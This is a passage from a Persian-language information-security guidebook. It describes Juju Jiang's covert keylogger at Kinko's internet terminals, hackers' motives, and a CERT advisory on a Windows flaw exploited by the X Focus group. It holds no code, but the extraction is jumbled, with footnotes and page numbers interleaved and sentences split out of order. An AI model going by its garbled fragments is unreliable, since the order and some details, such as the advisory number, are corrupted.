‫ﺟﻮﺟﻮ ﺟﻴﺎﻧﮓ‪ ٥٥‬ﺑﺪﻭﻥ ﺍﻃﻼ ﹺﻉ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺯ ﭘﺎﻳﺎﻧﻪﻫـﺎﻱ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ ﻓﺮﻭﺷﮕﺎﻫﻬﺎﻱ ﻛﻴﻨﻜﻮ‪ ٥٧‬ﺩﺭ ﻧﻴﻮﻳﻮﺭﻙ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﺮﺩﻧﺪ‪ ،‬ﺁﻧﭽﻪ ﻛﻪ ﺁﻧﻬﺎ ﺗﺎﻳﭗ ﻣﻲﻛﺮﺩﻧﺪ ﺭﺍ ﺛﺒﺖ ﻣﻲﻛﺮﺩ‪.‬‬
‫ﺟﻴﺎﻧﮓ ﺑﺼﻮﺭﺕ ﻣﺨﻔﻴﺎﻧﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍ ﺩﺭ ﺣﺪﺍﻗﻞ ﭼﻬﺎﺭﺩﻩ‬
‫ﻓﺮﻭﺷﮕﺎﻩ ﻛﻴﻨﻜﻮ ﻧﺼﺐ ﻛﺮﺩﻩ ﺑﻮﺩ ﻛﻪ ﻣﻲ ﺗﻮﺍﻧﺴﺖ ﻓﺸﺮﺩﻥ‬
‫‪٥٦‬‬
‫‪Web Server‬‬
‫‪Authentication Tokens‬‬
‫‪Denial of Access‬‬
‫‪Juju Jiang‬‬
‫‪Terminals‬‬
‫‪Kinko's Stores‬‬
‫‪52‬‬
‫‪53‬‬
‫‪54‬‬
‫‪55‬‬
‫‪56‬‬
‫‪57‬‬
‫‪٣٩‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬
‫ﺍﻳﻦ ﭘﺮﻭﻧﺪﻩ ﻛﻪ ﺩﺭ ﺍﻭﺍﻳـﻞ ﺍﻳـﻦ ﻣـﺎﻩ ﭘـﺲ ﺍﺯ ﺩﺳـﺘﮕﻴﺮﻱ‬
‫ﺟﻴﺎﻧﮓ ﻣﻨﺠﺮ ﺑﻪ ﺗﻌﻴﻴﻦ ﻣﺠﺎﺯﺍﺕ ﺑﺮﺍﻱ ﻭﻱ ﺷﺪ ﺧﻄﺮﻫﺎﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﻳﺎﻧﻪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﻛـﺎﻓﻲﻧـﺖﻫـﺎ‪،‬‬
‫ﻛﺘﺎﺑﺨﺎﻧﻪ ﻫـﺎ‪ ،‬ﻓﺮﻭﺩﮔﺎﻫﻬـﺎ ﻭ ﺩﻳﮕـﺮ ﻣﺆﺳـﺴﺎﺕ ﺭﺍ ﺁﺷـﻜﺎﺭ‬
‫ﻣﻲﺳـﺎﺯﺩ‪ .‬ﻧﻴـﻞ ﻣﻬﺘـﺎ‪ ٥٨‬ﻣﻬﻨـﺪﺱ ﭘـﮋﻭﻫﺶ ﺩﺭ ﻣﺆﺳـﺴﺔ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﻤﻦ ﺍﻳﻨﺘﺮﻧﺘﻲ‪ ٥٩‬ﻫﺸﺪﺍﺭ ﻣﻲﺩﻫﺪ ﻛﻪ "ﻫﻨﮕـﺎﻡ‬
‫ﺶ ﻋﺮﻓـﻲ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﺮ ﻳﻚ ﺍﺯ ﭘﺎﻳﺎﻧﻪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺍﺯ ﺩﺍﻧ ﹺ‬
‫ﺧﻮﺩ ﺑﻬﺮﻩ ﺑﮕﻴﺮﻳﺪ‪ .‬ﺑـﺮﺍﻱ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺭﻭﺯﻣـﺮﻩ‬
‫ﻧﻈﻴﺮ ﺍﺗﺼﺎﻝ ﺑـﻪ ﻭﺏ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﺎ ﻣـﺸﻜﻠﻲ ﻣﻮﺍﺟـﻪ‬
‫ﻧﺸﻮﻳﺪ ﺍﻣﺎ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﻫـﺮ ﻛـﺎﺭﻱ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺣﺴﺎﺳﻴﺖ ﺍﻳﺠﺎﺩ ﻛﻨﺪ ﺍﺑﺘـﺪﺍ ﻛﻤـﻲ ﻓﻜـﺮ ﻛﻨﻴـﺪ"‪ .‬ﺟﻴﺎﻧـﮓ‬
‫ﺯﻣﺎﻧﻲ ﺩﺳﺘﮕﻴﺮ ﺷﺪ ﻛﻪ ﻣﻄﺎﺑﻖ ﺳﻮﺍﺑﻖ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺩﺍﺩﮔـﺎﻩ‬
‫ﺍﺯ ﻳﻜﻲ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣـﺴﺮﻭﻗﻪ ﺑـﺮﺍﻱ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺠﻬﺰ ﺑﻪ ﻧـﺮﻡ ﺍﻓـﺰﺍﺭ ‪ GoToMyPC‬ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﺮﺩﻩ ﺑﻮﺩ‪ .‬ﺍﻳﻦ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺑﻪ ﺍﻓﺮﺍﺩ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﺯ ﺭﺍﻩ‬
‫ﺩﻭﺭ ﻭ ﺍﺯ ﻫﺮ ﻣﻜﺎﻧﻲ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ ﻛﻨﻨـﺪ‪.‬‬
‫ﺷﺨــﺼﻲ ﻛــﻪ ﺑﺮﻧﺎﻣــﺔ ‪ GoToMyPC‬ﺭﻭﻱ ﺭﺍﻳﺎﻧــﺔ ﻭﻱ‬
‫ﻧﺼﺐ ﺷﺪﻩ ﺑـﻮﺩ ﺩﺭ ﺯﻣـﺎﻥ ﻭﻗـﻮﻉ ﺟـﺮﻡ ﺩﺭ ﺧﺎﻧـﻪ ﺑـﻮﺩ ﻭ‬
‫ﻧﺎﮔﻬﺎﻥ ﻣﺘﻮﺟﻪ ﺷﺪ ﻣﻜـﺎﻥﻧﻤـﺎﻱ ﺭﺍﻳﺎﻧـﺔ ﺍﻭ ﺭﻭﻱ ﺻـﻔﺤﻪ‬
‫ﺷﺮﻭﻉ ﺑﻪ ﺣﺮﻛﺖ ﻛﺮﺩ ﻭ ﻓﺎﻳﻠﻬﺎ ﺧﻮﺩ ﺑﻪ ﺧـﻮﺩ ﺑـﺎﺯ ﺷـﺪﻧﺪ‪.‬‬
‫ﺳﭙﺲ ﺩﻳﺪ ﻛﻪ ﻳﻚ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﺑـﺎﺯ ﻭ ﻧـﺎﻡ ﺍﻭ ﺩﺭ ﻳـﻚ‬
‫ﺳﺮﻭﻳﺲ ﺧﺮﻳﺪ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭﺝ ﺷـﺪ‪ .‬ﺟﻴﺎﻧـﮓ ﻛـﻪ ﻣﻨﺘﻈـﺮ‬
‫ﺻﺪﻭﺭ ﺣﻜﻢ ﺩﺍﺩﮔـﺎﻩ ﺍﺳـﺖ‪ ،‬ﻧﻬﺎﻳﺘـﹰﺎ ﺩﺭ ﭼﻬـﺎﺭﺩﻫﻢ ﻓﻮﺭﻳـﻪ‬
‫‪ ۲۰۰۱‬ﺑﻪ ﻧﺼﺐ ﻛﺮﺩﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﻔﻲ ﺛﺒﺖﻛﻨﻨـﺪﺓ ﻛﻠﻴـﺪ‬
‫‪٦٠‬‬
‫ﺩﺭ ﻓﺮﻭﺷﮕﺎﻫﻬﺎﻱ ﻛﻴﻨﻜﻮ ﺍﻋﺘﺮﺍﻑ ﻛﺮﺩ‪.‬‬
‫ﺍﻳﻦ ﻛﺘﺎﺏ ﺭﺍﻫﻨﻤﺎﻳﻲ ﺩﺭﺑﺎﺭﺓ ﺍﻣﻨﻴﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻫﻢ ﺩﺭ ﻣﺤﻴﻂ ﺧﺎﻧـﻪ‬
‫ﻭ ﻫﻢ ﺩﺭ ﻣﺤﻴﻂ ﺗﺠﺎﺭﻱ ﻣﻲﺑﺎﺷﺪ ﻭ ﻟﺬﺍ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﻭﺳﻴﻌﻲ‬
‫ﺩﺭﺑﺎﺭﺓ ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﻣﺎﻧﻨـﺪ ﻣﺨـﺎﻃﺮﺍﺕ‪ ،‬ﻧﺘـﺎﻳﺞ ﺣﻤـﻼﺕ‪،‬‬
‫ﺭﻭﺷــﻬﺎﻱ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺭﺍﻳﺎﻧــﻪﻫــﺎ‪ ،‬ﺷــﺒﻜﻪﻫــﺎ ﻭ ﺩﺍﺩﻩﻫــﺎ‪ ،‬ﻭ ﻧﻴــﺰ‬
‫ﻲ‬
‫ﻱ ﺍﻣﻨﻴﺘـ ﹺ‬
‫ﻱ ﺍﺳﺘﺮﺍﺗﮋ ﹺ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﻗﺒﻞ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯ ﹺ‬
‫ﻣﺆﺛﺮ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ‪ .‬ﻫـﺪﻑ ﻧﻬـﺎﻳﻲ ﺍﻳـﻦ ﻛﺘـﺎﺏ‬
‫‪Neel Mehta‬‬
‫‪Internet Security Systems‬‬
‫‪Associated Press Bulletin, July 23, 2003‬‬
‫‪58‬‬
‫‪59‬‬
‫‪60‬‬
‫ﺍﻧﮕﻴﺰﺓ ﺧﺮﺍﺑﻜﺎﺭﺍﻥ ﺍﻣﻨﻴﺘﻲ ﭼﻴﺴﺖ؟‬
‫ﺩﺭ ﺯﻧﺪﮔﻲ ﻭﺍﻗﻌﻲ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺗﺨﻠﻔﺎﺕ ﺟﻨﺎﻳﻲ‬
‫ﻋﻠﻴﻪ ﻳﻚ ﺷﺨﺺ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻳﻜﻲ ﺍﺯ ﺩﻻﻳﻞ ﻋﻤـﺪﻩ‪،‬‬
‫ﺍﻧﺘﻘﺎﻣﮕﻴﺮﻱ ﻓﺮﺩ ﺧﺮﺍﺑﻜﺎﺭ ﺍﺯ ﺷﺨﺼﻲ ﻛـﻪ ﻓﻜـﺮ ﻣـﻲﻛﻨـﺪ ﺑـﻪ ﺍﻭ‬
‫ﺁﺳﻴﺒﻲ ﺭﺳﺎﻧﺪﻩ‪ ،‬ﻭ ﻳﺎ ﺑﺪﺳﺖﺁﻭﺭﺩﻥ ﭘﻮﻝ ﺍﺳﺖ‪.‬‬
‫ﻧﻈﻴﺮ ﻫﻤﻴﻦ ﺗﺨﻠﻔﺎﺕ ﻧﻴﺰ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺍﻣﺎ ﺗﺨﻠﻒ‬
‫ﺩﺭ ﺍﻳﻦ ﻓﻀﺎ ﺍﺯ ﺟﻨﺲ ﺩﻳﮕﺮﻱ ﺍﺳﺖ‪ .‬ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﺮﺍﻱ ﮔﺮﻭﻫﻲ‬
‫ﺍﺯ ﺍﻓﺮﺍﺩ ‪ -‬ﻛﻪ ﻋﻤﻮﻣﹰﺎ "ﺧﺮﺍﺑﻜﺎﺭ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﻧﺪ ﻭ ﻗﺎﺩﺭﻧـﺪ ﻭﺍﺭﺩ‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺍﻓﺮﺍﺩ ﺷﻮﻧﺪ ﻭ ﻳﺎ ﺑﻌﻨﻮﺍﻥ ﺗﻔﺮﻳﺢ ﻭ ﺳﺮﮔﺮﻣﻲ ﺑﻪ‬
‫ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺁﺳﻴﺐ ﺑﺮﺳﺎﻧﻨﺪ ‪ -‬ﻳﻚ ﻣﺤﻴﻂ ﭼﺎﻟﺶ ﺑﺮﺍﻧﮕﻴﺰ ﺍﺳـﺖ‪.‬‬
‫ﺑﻌﺒــﺎﺭﺕ ﺩﻳﮕــﺮ‪ ،‬ﺁﻧﻬــﺎ ﻗــﺪﺭﺕ ﻧﻔــﻮﺫ ﺑــﻪ ﺣــﺴﺎﺑﻬﺎﻱ ﻛــﺎﺭﺑﺮﻱ‪،‬‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﺷﺒﻜﻪﺍﻱ ﺭﺍ ﻳﻚ ﺍﻓﺘﺨﺎﺭ ﺑﺮﺍﻱ ﺧﻮﺩ‬
‫ﻣﻲﺩﺍﻧﻨﺪ‪ .‬ﻣﺸﺎﺑﻪ ﺍﻳﻦ ﺭﻓﺘﺎﺭ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺑﺴﻴﺎﺭ ﻧﺎﺩﺭ ﺍﺳﺖ‪.‬‬
‫ﻻ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺧﻮﺩ ﺭﺍ "ﺟﻨﺎﻳﺎﺕ ﺑﺪﻭﻥ ﻗﺮﺑﺎﻧﻲ" ﺑـﻪ‬
‫ﺧﺮﺍﺑﻜﺎﺭﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺣﺴﺎﺏ ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﺍﺳﺘﺪﻻﻝ ﺁﻧﻬﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻭﻗﺘﻲ ﻳﻚ ﺣﺴﺎﺏ‬
‫ﻛﺎﺭﺑﺮﻱ ﻳﺎ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ ﻭﻟـﻲ ﭼﻴـﺰﻱ‬
‫ﺗﻐﻴﻴﺮ ﻧﻤﻲﻳﺎﺑﺪ ﻭ ﺩﺯﺩﻳﺪﻩ ﻧﻤﻲﺷﻮﺩ ﭼـﻪ ﺁﺳـﻴﺒﻲ ﺑـﻪ ﻛـﺴﻲ ﻭﺍﺭﺩ‬
‫ﺷﺪﻩ ﺍﺳﺖ؟ ﺩﺭ ﻭﺍﻗﻊ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺑﻪ ﺗﺄﺛﻴﺮﺍﺕ ﺣﻘﻮﻗﻲ ﻭ ﭘﻴﺎﻣـﺪﻫﺎﻱ‬
‫ﺍﻳﻨﻜﺎﺭ ﺗﻮﺟﻪ ﻧﻤﻲﻛﻨﻨﺪ ﻭ ﺑﻪ ﺍﺣـﺴﺎﺱ ﻧـﺎﺍﻣﻨﻲ ﻗﺮﺑﺎﻧﻴﺎﻧـﺸﺎﻥ ﻛـﻪ‬
‫ﻧﺎﺷﻲ ﺍﺯ ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻣﻲﺷﻮﺩ ﻧﻴـﺰ ﺍﻫﻤﻴﺘـﻲ ﻧﻤـﻲ ﺩﻫﻨـﺪ‪.‬‬
‫ﻣﺸﺎﺑﻪ ﺍﻳﻦ ﺭﻓﺘﺎﺭ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﺜﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻓﺮﺩﻱ ﻭﺍﺭﺩ‬
‫ﺧﺎﻧﺔ ﺷﻤﺎ ﺷﻮﺩ ﻭ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﻧﻴﺰ ﺑﺘﻮﺍﻧﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺗﻜﺮﺍﺭ‬
‫ﻛﻨﺪ‪ .‬ﻣﺴﻠﻤﹰﺎ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻏﻴﺮﻗﺎﺑﻞ ﺗﺤﻤﻞ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﻧﺎﻗﻀﺎﻥ ﺍﻣﻨﻴﺖ ﻛﻤـﻚ ﺯﻳـﺎﺩﻱ ﻣـﻲ ﻛﻨـﺪ‪.‬‬
‫ﺑﺮﺧــﻲ ﺍﺯ ﺧﺮﺍﺑﻜﺎﺭﻫــﺎ ﺩﺍﺭﺍﻱ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﻧﻔــﻮﺫ ﻫــﺴﺘﻨﺪ ﻛــﻪ ﺑــﻪ‬
‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﺎﺯﻩﻛﺎﺭ ﻫﻢ ﺍﻣﻜﺎﻥ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﺯ ﺑﺮﺧﻲ‬
‫ﻻ ﺑﻪ ﮔﺮﻭﻫﻬﺎﻱ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺭﺍ ﻣﻲﺩﻫﺪ‪ .‬ﭼﻨﻴﻦ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﺧﺒﺮﻱ ‪ Usenet‬ﻛﻪ ﺑﺴﻴﺎﺭ ﻣﺸﻬﻮﺭ ﻫﺴﺘﻨﺪ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻭ‬
‫ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺑـﺰﺍﺭ ﺭﺍ ﺍﺯ ﺁﻧﺠـﺎ ﭘﻴـﺪﺍ ﻛـﺮﺩﻩ ﻭ ﻣـﻮﺭﺩ‬
‫ﺑﺨﺶ ﺍﻭﻝ‬
‫ﻛﻠﻴﺪﻫﺎﻱ ﺍﻓﺮﺍﺩ ﺭﺍ ﺛﺒﺖ ﻧﻤﺎﻳﺪ‪ .‬ﺍﻳـﻦ ﻧـﺮﻡ ﺍﻓـﺰﺍﺭ ﺩﺭ ﻃـﻮﻝ‬
‫ﻓﻌﺎﻟﻴﺖ ﻳﻜﺴﺎﻟﺔ ﺧﻮﺩ ﺑﻴﺶ ﺍﺯ ‪ ۴۵۰‬ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ‬
‫ﻋﺒــﻮﺭ ﺛﺒــﺖ ﻛــﺮﺩﻩ ﻭ ﺍﺯ ﺁﻧﻬــﺎ ﺑــﺮﺍﻱ ﺩﺳﺘﺮﺳــﻲ ﻭ ﺣﺘــﻲ‬
‫ﺑﺎﺯﻛﺮﺩﻥ ﺣﺴﺎﺑﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺑﺮﺧﻂ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﻮﺩ‪.‬‬
‫ﺩﻭﺭ ﺳﺎﺧﺘﻦ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ﻣﻨﺎﺑﻊ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ‬
‫ﺟﺪﻳﺪ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﻜﻪ ﻗﺪﺭﺕ ﺑﺨـﺸﻴﺪﻥ ﺑـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ﺑـﺮﺍﻱ ﻟـﺬﺕ‬
‫ﺑﺮﺩﻥ ﺍﺯ ﺍﻳﻦ ﺩﻧﻴﺎﻱ ﻧﻮﻳﻦ ﺑﻪ ﺭﻭﺷﻲ ﺍﻳﻤﻦ ﻭ ﻣﻄﻤـﺌﻦ ﺍﺳـﺖ‪ .‬ﺩﺭ‬
‫ﻳﻚ ﻛﻼﻡ ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻫﺪﻑ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺗﻮﺳـﻌﺔ‬
‫ﺩﺭﻙ ﻭﺍﻗﻊﮔﺮﺍﻳﺎﻧﻪ ﻭ ﻋﻤﻴﻖ ﺍﺯ ﻣﺎﻫﻴﺖ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻣﻮﺟـﻮﺩ‬
‫ﺑﻪ ﻣﻨﻈﻮﺭ ﻛﺎﻫﺶ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺍﻓﺰﺍﻳﺶ ﻧﻘﺎﻁ ﻗـﻮﺕ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫‪٤٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ ﺍﺑﺰﺍﺭﻫـﺎ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺑﺪﻭﻥ ﺧﻄﺮ ﺑﺎﺷـﻨﺪ‪ ،‬ﻫﺮﮔـﺰ ﻛـﺴﻲ ﻣﻄﻤـﺌﻦ ﻧﻴـﺴﺖ ﺁﺛـﺎﺭ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﺮﻳﻚ ﺍﺯ ﺁﻧﻬـﺎ ﺩﻗﻴﻘـﹰﺎ ﭼﻴـﺴﺖ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ ﺁﻥ ﺍﻳـﻦ‬
‫ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎ ﺍﻧﺠﺎﻡ ﺗﻐﻴﻴﺮﺍﺗﻲ ﺩﺭ ﺑﻌﻀﻲ ﺍﺯ ﺍﻳـﻦ ﺍﺑـﺰﺍ ﹺﺭ‬
‫ﺑﻪﺍﺻﻄﻼﺡ ﺑﻲﺧﻄﺮ ﺑﺘﻮﺍﻥ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻛـﻪ‬
‫ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﻬﺎ ﻣﻮﺭﺩ ﺩﺳﺘﺮﺳﻲ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ ﺁﺳﻴﺐ ﻭﺍﺭﺩ ﻛﺮﺩ‪ .‬ﺩﺭ‬
‫ﺍﺩﺍﻣﻪ‪ ،‬ﻳﻚ ﻧﻤﻮﻧﻪ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ‪:‬‬
‫ﺳﻨﺪ ‪ CA-203-18‬ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬـﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﺁﺧﺮﻳﻦ ﺣﻔﺮﺓ ‪ Windows‬ﺭﺍ ﻣﺴﺘﻨﺪ ﻛﺮﺩﻩ‪ ،‬ﻭ ‪ CNet‬ﻧﻴﺰ‬
‫ﮔﺰﺍﺭﺵ ﺩﺍﺩﻩ ﻛﻪ ﺑﺎ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺍﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺑﺮﺍﻱ‬
‫ﻧﻔﻮﺫ ﺑﻪ ‪ Windows‬ﺭﺍﻩ ﺑﺮﺍﻱ ﻇﻬﻮﺭ ﺑـﺮﻕﺁﺳـﺎ ﻭ ﺣﻤﻠـﺔ‬
‫ﺷﺪﻳﺪ ﻳﻚ ﻛﺮﻡ ﺩﻳﮕﺮ ﻫﻤﻮﺍﺭ ﻣﻲﺷﻮﺩ‪:‬‬
‫ﭘﮋﻭﻫﺸﮕﺮﺍﻥ ﺍﻣﻨﻴﺘﻲ ﻫـﺸﺪﺍﺭ ﺩﺍﺩﻩﺍﻧـﺪ ﻛـﻪ ﻳـﻚ ﮔـﺮﻭﻩ ﺍﺯ‬
‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﺮﻧﺎﻣـﻪﺍﻱ ﻣﻨﺘـﺸﺮ ﻛـﺮﺩﻩﺍﻧـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺳـﻮﺀ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺍﺷﻜﺎﻝ ﻋﻤﺪﺓ ‪ Windows‬ﻃﺮﺍﺣﻲ ﺷـﺪﻩ‬
‫ﻭ ﺭﺍﻩ ﺭﺍ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﺣﻤﻠـﺔ ﺑـﺰﺭﮒ ﺗـﺎ ﺍﻭﺍﺧـﺮ ﻫﻔﺘـﺔ‬
‫ﺟﺎﺭﻱ ﺑﺎﺯ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﻫﺸﺪﺍﺭ ﺭﻭﺯ ﺟﻤﻌﻪ ﺍﻋﻼﻡ ﺷﺪ؛ ﺑﻌـﺪ‬
‫ﺍﺯ ﺁﻧﻜﻪ ﻧﻔﻮﺫﮔﺮﺍﻥ ﭼﻴﻨﻲ ﮔﺮﻭﻩ ﺍﻣﻨﻴﺘـﻲ ‪ X Focus‬ﻣـﺘﻦ‬
‫ﺑﺮﻧﺎﻣﻪﺍﻱ ﺭﺍ ﺑﺮﺍﻱ ﭼﻨﺪﻳﻦ ﻣﺮﻛﺰ ﺍﻣﻨﻴﺘﻲ ﺩﻧﻴﺎ ﻣﻨﺘﺸﺮ ﻛﺮﺩﻧﺪ‬
‫ﻛﻪ ﺑﺎ ﻃﺮﺍﺣﻲ ﻣﺎﻫﺮﺍﻧﻪ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﺍﺭﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣـﻞ‬
‫‪ Windows‬ﻧﻔﻮﺫ ﻣﻲﻛﺮﺩ‪.‬‬
‫ﺑﺮﻧﺎﻣـــﺔ ﮔـــﺮﻭﻩ ‪ X Focus‬ﺍﺯ ﺍﺷـــﻜﺎﻝ ﻣﻮﺟـــﻮﺩ ﺩﺭ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﻬﺮﻩﺑـﺮﺩﺍﺭﻱ ﻣـﻲﻛﻨـﺪ ﻭ ﺑـﻪ‬
‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﻣﻜﺎﻥ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺭﺍ ﻣـﻲﺩﻫـﺪ‪.‬‬
‫ﺍﻳــﻦ ﺍﺷــﻜﺎﻝ ﺗﻮﺳــﻂ ﭼﻨــﺪ ﻧﻔــﺮ ﺍﺯ ﻣﺘﺨﺼــﺼﻴﻦ ﺑﻌﻨــﻮﺍﻥ‬
